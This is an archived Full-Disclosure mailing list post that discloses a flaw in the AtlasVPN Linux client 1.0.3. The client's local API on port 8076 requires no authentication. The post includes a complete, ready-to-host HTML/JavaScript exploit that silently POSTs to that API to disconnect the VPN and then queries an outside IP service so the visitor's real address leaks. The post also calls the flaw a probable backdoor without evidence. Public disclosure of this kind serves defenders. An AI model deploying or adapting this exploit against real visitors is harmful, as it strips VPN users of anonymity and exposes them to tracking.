lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list] 
Date: Fri, 01 Sep 2023 18:49:19 +0000
From: icudar via Fulldisclosure <fulldisclosure@...lists.org>
To: "fulldisclosure@...lists.org" <fulldisclosure@...lists.org>
Subject: [FD] AtlasVPN Linux Client 1.0.3 IP Leak Exploit

The following is my 0day. This code, when executed on any website, disconnects the AtlasVPN linux client and leaks the users IP address. I am not yet aware of it being used in the wild. However, it shows that AtlasVPN does not take their users safety serious, because their software security decisions suck so massively that its hard to believe this is a bug rather than a backdoor. Nobody can be this incompetent. I tried to contact their support to get hold of a security contact, a pgp key or any signs of a bug bounty programme. Nope. No answer.

Root Cause

The AtlasVPN Linux Client consists of two parts. A daemon (atlasvpnd) that manages the connections and a client (atlasvpn) that the user controls to connect, disconnect and list services. The client does not connect via a local socket or any other secure means but instead it opens an API on localhost on port 8076. It does not have ANY authentication. This port can be accessed by ANY program running on the computer, including the browser. A malicious javascript on ANY website can therefore craft a request to that port and disconnect the VPN. If it then runs another request, this leaks the users home IP address to ANY website using the exploit code.

Exploit Code

The following code demonstrates the issue. It can be uploaded to any webserver. When the site is visited, AtlasVPN disconnects and leaks the IP address. Not intended for illegal purposes.



    <html>
     <head>
      <title>=[ atlasvpnd 1.0.3 remote disconnect exploit ]=</title>
    </head>
     <body>
      <pre><code id="log">=[ atlasvpnd 1.0.3 remote disconnect exploit ]=
     You should be running the atlasvpn linux client and be connected to a VPN.
    Use <b>atlasvpn connect</b> to connect to a VPN server.
     </code></pre>
       <iframe id="hiddenFrame" name="hiddenFrame" style="display: none;"></iframe>
      <form id="stopForm" action="http://127.0.0.1:8076/connection/stop" method="post" target="hiddenFrame">
        <button type="submit" style="display: none"></button>
      </form>
       <script>
        window._currentIP = false;
         // Run main exploit code
        window.addEventListener('load', function () {
          addIPToLog();
          setTimeout(triggerFormSubmission, 1000);
          setTimeout(addIPToLog, 3000);
        });
         // Blind CORS request to atlasvpnd to disconnect the VPN
        function triggerFormSubmission() {
          var logDiv = document.getElementById('log');
          logDiv.innerHTML += "[-] Sending disconnect request to atlasvpnd...\n";
          document.getElementById('stopForm').submit();
        }
         // Gets IP from ipfy API (this, of course, could be your server)
        function addIPToLog() {
          var logDiv = document.getElementById('log');
          var xhr = new XMLHttpRequest();
           xhr.open('GET', 'https://api.ipify.org?format=json', true);
           xhr.onload = function () {
            var ipAddress = window._currentIP;
            if (xhr.status === 200) {
              var response = JSON.parse(xhr.responseText);
              ipAddress = response.ip;
               logDiv.innerHTML += '[?] Current IP:' + ipAddress + "\n";
            } else {
              logDiv.innerHTML += '[-] Error fetching IP address.\n';
            }
             // Check if the IP changed. If yes: Success.
            if (window._currentIP && window._currentIP != ipAddress) {
              logDiv.innerHTML += "[+] Successfully disconnected VPN."
            }
            if (window._currentIP && window._currentIP == ipAddress) {
              logDiv.innerHTML += "[-] Disconnect failed our you were not connected to the VPN in the first place."
            }
             // Save IP for next iteration.
            window._currentIP = ipAddress;
          };
           xhr.send();
        }
      </script>
    </body>
    </html>
    


Greets

Fly out to a certain crafter of trashy maps and my favourite WoW NPC. I hope this makes it into the press. Peace out.
Download attachment "publickey - icudar@...ton.me - 0x662872F4.asc" of type "application/pgp-keys" (641 bytes)

Download attachment "signature.asc" of type "application/pgp-signature" (250 bytes)

_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: https://seclists.org/fulldisclosure/

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ